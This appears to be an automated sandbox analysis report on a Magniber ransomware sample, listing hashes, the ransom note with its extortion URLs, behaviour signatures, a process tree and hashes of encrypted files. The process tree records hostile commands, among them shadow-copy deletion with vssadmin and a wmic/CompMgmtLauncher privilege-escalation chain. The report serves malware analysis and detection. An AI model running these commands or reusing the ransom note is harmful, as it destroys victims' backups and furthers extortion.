Analysis

  • max time kernel
    120s
  • max time network
    199s
  • platform
    windows7_x64
  • resource
    win7v20210408
  • submitted
    22-06-2021 15:20

General

  • Target

    9.exe

  • Size

    21KB

  • MD5

    6e4d7e63e05ef919d2b8724fbc3f3eeb

  • SHA1

    97730b10da62c23ee6554625f5c24bf262aae261

  • SHA256

    a5a2b6bfba012554d3c7e01c9df1173f995639caf31fdde8693e30ef501d26d7

  • SHA512

    641c16245535d0e7eff19063830f8b8448d51fdefd6384a615495709b203c1522603292140b951cd220d1cd22e0f414f5c0e156633b2eb69f8ecf7fde8cdef86

Score
10/10

Malware Config

Extracted

Path

C:\Users\Admin\Desktop\readme.txt

Family

magniber

Ransom Note

ALL YOUR DOCUMENTS PHOTOS DATABASES AND OTHER IMPORTANT FILES HAVE BEEN ENCRYPTED!
====================================================================================================
Your files are NOT damaged! Your files are modified only. This modification is reversible.
The only 1 way to decrypt your files is to receive the private key and decryption program.
Any attempts to restore your files with the third party software will be fatal for your files!
====================================================================================================
To receive the private key and decryption program follow the instructions below:
1. Download "Tor Browser" from https://www.torproject.org/ and install it.
2. In the "Tor Browser" open your personal page here:
http://0ce07ed8d4c45800ssdxwead.ndkeblzjnpqgpo5o.onion/ssdxwead
Note! This page is available via "Tor Browser" only.
====================================================================================================
Also you can use temporary addresses on your personal page without using "Tor Browser":
http://0ce07ed8d4c45800ssdxwead.lieedge.casa/ssdxwead
http://0ce07ed8d4c45800ssdxwead.wonride.site/ssdxwead
http://0ce07ed8d4c45800ssdxwead.lognear.xyz/ssdxwead
http://0ce07ed8d4c45800ssdxwead.bejoin.space/ssdxwead
Note! These are temporary addresses! They will be available for a limited amount of time!
URLs

http://0ce07ed8d4c45800ssdxwead.ndkeblzjnpqgpo5o.onion/ssdxwead

http://0ce07ed8d4c45800ssdxwead.lieedge.casa/ssdxwead

http://0ce07ed8d4c45800ssdxwead.wonride.site/ssdxwead

http://0ce07ed8d4c45800ssdxwead.lognear.xyz/ssdxwead

http://0ce07ed8d4c45800ssdxwead.bejoin.space/ssdxwead

Signatures

  • Magniber Ransomware

    Ransomware family widely seen in Asia being distributed by the Magnitude exploit kit.

  • Process spawned unexpected child process 8 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Deletes shadow copies 2 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Modifies extensions of user files 9 IoCs

    Ransomware generally changes the extension on encrypted files.

  • Suspicious use of SetThreadContext 3 IoCs
  • Interacts with shadow copies 2 TTPs 4 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies Internet Explorer settings 1 TTPs 34 IoCs
  • Modifies registry class 11 IoCs
  • Opens file in notepad (likely ransom note) 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 2 IoCs
  • Suspicious behavior: MapViewOfSection 3 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 6 IoCs
  • Suspicious use of SendNotifyMessage 8 IoCs
  • Suspicious use of SetWindowsHookEx 6 IoCs
  • Suspicious use of WriteProcessMemory 61 IoCs

Processes

  • C:\Windows\Explorer.EXE
    C:\Windows\Explorer.EXE
    1⤵
    • Modifies registry class
    • Suspicious use of AdjustPrivilegeToken
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:1224
    • C:\Users\Admin\AppData\Local\Temp\9.exe
      "C:\Users\Admin\AppData\Local\Temp\9.exe"
      2⤵
      • Suspicious use of SetThreadContext
      • Modifies registry class
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: MapViewOfSection
      • Suspicious use of WriteProcessMemory
      PID:1988
      • C:\Windows\system32\cmd.exe
        cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
        3⤵
        • Suspicious use of WriteProcessMemory
        PID:1792
        • C:\Windows\system32\wbem\WMIC.exe
          C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
          4⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:1304
    • C:\Windows\system32\cmd.exe
      cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1844
      • C:\Windows\system32\wbem\WMIC.exe
        C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:848
  • C:\Windows\system32\Dwm.exe
    "C:\Windows\system32\Dwm.exe"
    1⤵
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:1180
    • C:\Windows\system32\cmd.exe
      cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1344
      • C:\Windows\system32\wbem\WMIC.exe
        C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
        3⤵
        PID:1648
  • C:\Windows\system32\taskhost.exe
    "taskhost.exe"
    1⤵
    • Modifies extensions of user files
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:1120
    • C:\Windows\system32\notepad.exe
      notepad.exe C:\Users\Public\readme.txt
      2⤵
      • Opens file in notepad (likely ransom note)
      PID:1372
    • C:\Windows\system32\cmd.exe
      cmd /c "start http://0ce07ed8d4c45800ssdxwead.lieedge.casa/ssdxwead^&1^&39881967^&72^&315^&12"
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:692
      • C:\Program Files\Internet Explorer\iexplore.exe
        "C:\Program Files\Internet Explorer\iexplore.exe" http://0ce07ed8d4c45800ssdxwead.lieedge.casa/ssdxwead&1&39881967&72&315&12
        3⤵
        • Modifies Internet Explorer settings
        • Suspicious use of FindShellTrayWindow
        • Suspicious use of SetWindowsHookEx
        • Suspicious use of WriteProcessMemory
        PID:1788
        • C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE
          "C:\Program Files (x86)\Internet Explorer\IEXPLORE.EXE" SCODEF:1788 CREDAT:275457 /prefetch:2
          4⤵
          • Modifies Internet Explorer settings
          • Suspicious use of SetWindowsHookEx
          PID:1052
    • C:\Windows\system32\cmd.exe
      cmd.exe /c "%SystemRoot%\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe""
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1608
      • C:\Windows\system32\wbem\WMIC.exe
        C:\Windows\system32\wbem\wmic process call create "cmd /c CompMgmtLauncher.exe"
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:1848
  • C:\Windows\system32\cmd.exe
    cmd /c CompMgmtLauncher.exe
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:612
    • C:\Windows\system32\CompMgmtLauncher.exe
      CompMgmtLauncher.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1732
      • C:\Windows\system32\wbem\wmic.exe
        "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
        3⤵
        PID:1652
  • C:\Windows\system32\cmd.exe
    cmd /c CompMgmtLauncher.exe
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:1308
    • C:\Windows\system32\CompMgmtLauncher.exe
      CompMgmtLauncher.exe
      2⤵
      PID:1600
      • C:\Windows\system32\wbem\wmic.exe
        "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
        3⤵
        PID:304
  • C:\Windows\system32\cmd.exe
    cmd /c CompMgmtLauncher.exe
    1⤵
    • Process spawned unexpected child process
    PID:1804
    • C:\Windows\system32\CompMgmtLauncher.exe
      CompMgmtLauncher.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:1556
      • C:\Windows\system32\wbem\wmic.exe
        "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
        3⤵
        PID:1060
  • C:\Windows\system32\cmd.exe
    cmd /c CompMgmtLauncher.exe
    1⤵
    • Process spawned unexpected child process
    • Suspicious use of WriteProcessMemory
    PID:292
    • C:\Windows\system32\CompMgmtLauncher.exe
      CompMgmtLauncher.exe
      2⤵
      • Suspicious use of WriteProcessMemory
      PID:676
      • C:\Windows\system32\wbem\wmic.exe
        "C:\Windows\system32\wbem\wmic.exe" process call create "vssadmin.exe Delete Shadows /all /quiet"
        3⤵
        PID:1084
  • C:\Windows\system32\conhost.exe
    \??\C:\Windows\system32\conhost.exe "2100226177-423966974-3799054542608157131163108094-2108732498-15245291691214588763"
    1⤵
    • Suspicious use of AdjustPrivilegeToken
    PID:1648
  • C:\Windows\system32\DllHost.exe
    C:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:1600
  • C:\Windows\system32\vssadmin.exe
    vssadmin.exe Delete Shadows /all /quiet
    1⤵
    • Process spawned unexpected child process
    • Interacts with shadow copies
    PID:1644
  • C:\Windows\system32\vssadmin.exe
    vssadmin.exe Delete Shadows /all /quiet
    1⤵
    • Process spawned unexpected child process
    • Interacts with shadow copies
    PID:1684
  • C:\Windows\system32\vssadmin.exe
    vssadmin.exe Delete Shadows /all /quiet
    1⤵
    • Process spawned unexpected child process
    • Interacts with shadow copies
    PID:764
  • C:\Windows\system32\vssadmin.exe
    vssadmin.exe Delete Shadows /all /quiet
    1⤵
    • Process spawned unexpected child process
    • Interacts with shadow copies
    • Suspicious use of WriteProcessMemory
    PID:1804
  • C:\Windows\system32\vssvc.exe
    C:\Windows\system32\vssvc.exe
    1⤵
    PID:960

Network

MITRE ATT&CK Enterprise v6

Downloads

                • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Cookies\C8J50LBR.txt

                  MD5

                  966a75c744e5db994ab9fdceb5e4d095

                  SHA1

                  38f67c118cab4e1eca8c17b49ebe366aa246fc5e

                  SHA256

                  87ee030e99c6f242a92c8b035f9c2fddb1859fc63418e6d07f3d1b89ad905069

                  SHA512

                  1407fac116922c3af44ae74e3448e6d1e5e1c89f7cb0e7d3b20a3855491a1b6766c7669c7e91b52509cf48f24ea524e49fdb5f6a52b0d9ee934f229ef2d8f35a

                • C:\Users\Admin\Desktop\CompleteStart.emf.ssdxwead

                  MD5

                  a6163698a84846f4cffde05ba32da46c

                  SHA1

                  65a87f81aea0a45fd6406c1b4f4c3ac9191fcc3e

                  SHA256

                  24417d0c8bfa46407961a53a6f119e1f74cf15b1a8af48ff459b3a0a756199be

                  SHA512

                  f66b2b0d930de6fa08081f550b751fe253df5db5377b85c40c5be632f4f883be527209f214d49638b92ca8e0bb1e9a47c9dda634775da3600e953a508bb35523

                • C:\Users\Admin\Desktop\ConvertToEnter.mov.ssdxwead

                  MD5

                  8ede3038c923ecde6e790efd4ba35736

                  SHA1

                  8c54b0ca577b244533b26dcea44c95a31fd0df88

                  SHA256

                  852b18f05e4fb1ccf7288e2e20f75a52a7da938996c00b10eef7c0d576762b79

                  SHA512

                  fbf871d22cfa605cc383ff395ab9a9aad56317236c7158760171ac10c3b01ab1ffd656025ee366a4c17611609fdff0c461cb540e0868d93303eddff14d6ccef7

                • C:\Users\Admin\Desktop\FormatConfirm.mov.ssdxwead

                  MD5

                  720143e024af846ea0e35dc7601c14fa

                  SHA1

                  96dccfa11551d6a6a60e24af00de6e085dc536d9

                  SHA256

                  f08afe808e611b347460471a707a3c0229f2e21a91a11e8479d93904421aaf60

                  SHA512

                  8ca5eca7dd2b40075543b311f98dbd56d0ef63f313ffd41619781e38117b6381c9441484a117d7f3001f694f3cb4356f2e2ea083f0681a02ea9ad8d22c9e6e71

                • C:\Users\Admin\Desktop\MergeJoin.bmp.ssdxwead

                  MD5

                  56644ba80e2f0f68b03ae1be93c04e5d

                  SHA1

                  7b91e178f59b4782078b697e5c7e5d54181c4d2f

                  SHA256

                  89e1e5b619e1cc6372d3aaed15eead85abc3ae86386446560c352afc7e00fc1c

                  SHA512

                  6b984b9445d13ffeaaf0f588f51b1b6d488cdce454bc26d52a9f544bda9f11d74faecf9e12bf21ac95f120101c01e82d6b129d4bcc937c6b224a4bddc48bdf87

                • C:\Users\Admin\Desktop\MergeTest.svgz.ssdxwead

                  MD5

                  9ac76e1876ea14f3ee9932c0b42711be

                  SHA1

                  ef8bfff4630e463d14e4b061c7e66a91d94600ff

                  SHA256

                  93f4570fb75da6a5a857fef90ef240c94819f0bfac4ad916f3b5af378de84352

                  SHA512

                  6339b10fac48cca1c5c01c11f196ce940cc3ec5273b18ec51863454bcb14d6b10f90de9fb13f78eaea148efc878387e8ae18ec227ff9d98b26e7d70d3414f02f

                • C:\Users\Admin\Desktop\NewConnect.nfo.ssdxwead

                  MD5

                  266c6a41b13a602a2c6b4d9e091708d3

                  SHA1

                  0e525b0d6db77fc47620e1dd4f0658456091df60

                  SHA256

                  2b23b09e63ef2cf53e03ed5aa588fb7362decf3f3a61cbeecb7fdd344c203f9b

                  SHA512

                  f76c4f24481bf240e2933ae5bf4ec5a1d99476e866636b6e4fbf9145aed68e95e2870af5efec90ebb39a801cdefdecc9948d8eaee05f234d5323f9cc3350c991

                • C:\Users\Admin\Desktop\PopConfirm.pot.ssdxwead

                  MD5

                  baaaba86b979f2a3a4876baa0a43823f

                  SHA1

                  892cf323a67ba0e634a041a3c8d7c6e430c33b02

                  SHA256

                  69ca28e9fd5fb20e72fd984c77e8e9ee58703a882227a017c11fd15378e0060c

                  SHA512

                  af779f7be0032489de103123edfdccc76cf52f110c889985f11929a057f792c08dd75229a68e50cefc08ca6c18139a66e1a8fdebb565df9eeefb805c6a93300c

                • C:\Users\Admin\Desktop\PushRead.bmp.ssdxwead

                  MD5

                  db5f659a7760171aad647496717b158f

                  SHA1

                  f626cbe6c147e8dd86324b94a3b74bb01d3d646e

                  SHA256

                  01d20dfcbccf168a72ecb361dc1718c93846e1617012d73be0eb914c82169edc

                  SHA512

                  62de7ad82f18f1fca361fa02a681dcb7cbde2d650585251270bc88432d314721275376aa629a000058555997c46697788aec7ba107fd7921d245661566655797

                • C:\Users\Admin\Desktop\StepUninstall.jpg.ssdxwead

                  MD5

                  c48ecb552c993735b2d4a807d1d51916

                  SHA1

                  f1e050135ba46d98d1bdd1479c5c1cdfc4462ca2

                  SHA256

                  4458b7028f42bd61597bc912554a6e24809031caddab89fb2bcd91b7f9feb6de

                  SHA512

                  08369e8f782393d026ca0457485fcc161a60ff0cb68196077664853cf0e483ac82ddd932cdbd6f3f58eaeffd9459a4a60e154bb3fb364b0734d764dbc753dc66

                • C:\Users\Admin\Desktop\UnblockShow.xps.ssdxwead

                  MD5

                  5701c241a93865b3c0f07245f7aa1df8

                  SHA1

                  b404526a9bad213193b436edc74aa54ac2d0e4fa

                  SHA256

                  8101cf7d35fee8ccf792e035e2b8a0995a957379fe5aaa0273b50fcf3c41c6ef

                  SHA512

                  cb32ea4e6a3a031703b65bacb86b1a959f807a7302beee3c3b89f3db6bf7736dbf3c3a44562a9acbcbac726730a1d2c3c7ab44e6a48a4f269581192c283d5613

                • C:\Users\Admin\Desktop\UpdateGet.xps.ssdxwead

                  MD5

                  2ce49dc91ae538a4a2b4c05d18116102

                  SHA1

                  1e299fe87de28d18f6ecd799b4799c38f08e74b6

                  SHA256

                  bfbe69cfe4f9b0f1b320db53a2fbafa63ebb763257d6ef24572661add98b5b99

                  SHA512

                  45e4ce724d3aecd4c422b9f5b2b2d7847852c7182b2350b1096b17051af6b1d7944b932f91c667f554983eba577f35a1dbe0676be2bad8bd201432b10bbcd066

                • C:\Users\Admin\Desktop\readme.txt

                  MD5

                  77defd8bcb8c2580d63aa544f4e22126

                  SHA1

                  88a3b2b164da59a78cd0783c55dbf945f331a828

                  SHA256

                  15a3fe88e8dd41c4f55f0cd537f601649ce57a7932540b8269ec2047ed1a74cd

                  SHA512

                  a9a074d720dc6ab91e0f156c49f3c3332285fd4de90fb2899d05f9d5d8eabc8fca8abd1f195a0c6cbb12e94d50d9483bac05011560658e851d96919372692e0b

                • C:\Users\Public\readme.txt

                  MD5

                  77defd8bcb8c2580d63aa544f4e22126

                  SHA1

                  88a3b2b164da59a78cd0783c55dbf945f331a828

                  SHA256

                  15a3fe88e8dd41c4f55f0cd537f601649ce57a7932540b8269ec2047ed1a74cd

                  SHA512

                  a9a074d720dc6ab91e0f156c49f3c3332285fd4de90fb2899d05f9d5d8eabc8fca8abd1f195a0c6cbb12e94d50d9483bac05011560658e851d96919372692e0b

                • memory/304-148-0x0000000000000000-mapping.dmp

                • memory/676-137-0x0000000000000000-mapping.dmp

                • memory/692-127-0x0000000000000000-mapping.dmp

                • memory/848-134-0x0000000000000000-mapping.dmp

                • memory/1052-150-0x0000000000000000-mapping.dmp

                • memory/1060-146-0x0000000000000000-mapping.dmp

                • memory/1084-147-0x0000000000000000-mapping.dmp

                • memory/1120-96-0x00000000002D0000-0x00000000002D4000-memory.dmp

                  Filesize

                  16KB

                • memory/1224-79-0x0000000002740000-0x0000000002750000-memory.dmp

                  Filesize

                  64KB

                • memory/1304-136-0x0000000000000000-mapping.dmp

                • memory/1344-131-0x0000000000000000-mapping.dmp

                • memory/1372-123-0x0000000000000000-mapping.dmp

                • memory/1372-125-0x000007FEFC051000-0x000007FEFC053000-memory.dmp

                  Filesize

                  8KB

                • memory/1556-140-0x0000000000000000-mapping.dmp

                • memory/1600-139-0x0000000000000000-mapping.dmp

                • memory/1608-128-0x0000000000000000-mapping.dmp

                • memory/1648-133-0x0000000000000000-mapping.dmp

                • memory/1652-149-0x0000000000000000-mapping.dmp

                • memory/1732-138-0x0000000000000000-mapping.dmp

                • memory/1788-145-0x0000000000000000-mapping.dmp

                • memory/1792-135-0x0000000000000000-mapping.dmp

                • memory/1844-132-0x0000000000000000-mapping.dmp

                • memory/1848-130-0x0000000000000000-mapping.dmp

                • memory/1988-62-0x0000000000200000-0x0000000000201000-memory.dmp

                  Filesize

                  4KB

                • memory/1988-87-0x0000000001CB0000-0x0000000001CB1000-memory.dmp

                  Filesize

                  4KB

                • memory/1988-88-0x0000000001CC0000-0x0000000001CC1000-memory.dmp

                  Filesize

                  4KB

                • memory/1988-89-0x0000000001CD0000-0x0000000001CD1000-memory.dmp

                  Filesize

                  4KB

                • memory/1988-63-0x0000000000210000-0x0000000000211000-memory.dmp

                  Filesize

                  4KB

                • memory/1988-61-0x00000000001F0000-0x00000000001F1000-memory.dmp

                  Filesize

                  4KB

                • memory/1988-91-0x0000000001D00000-0x0000000001D01000-memory.dmp

                  Filesize

                  4KB

                • memory/1988-59-0x0000000000020000-0x0000000000025000-memory.dmp

                  Filesize

                  20KB

                • memory/1988-92-0x0000000001D10000-0x0000000001D11000-memory.dmp

                  Filesize

                  4KB

                • memory/1988-93-0x0000000001D20000-0x0000000001D21000-memory.dmp

                  Filesize

                  4KB

                • memory/1988-94-0x0000000001D30000-0x0000000001D31000-memory.dmp

                  Filesize

                  4KB

                • memory/1988-60-0x0000000000070000-0x0000000000071000-memory.dmp

                  Filesize

                  4KB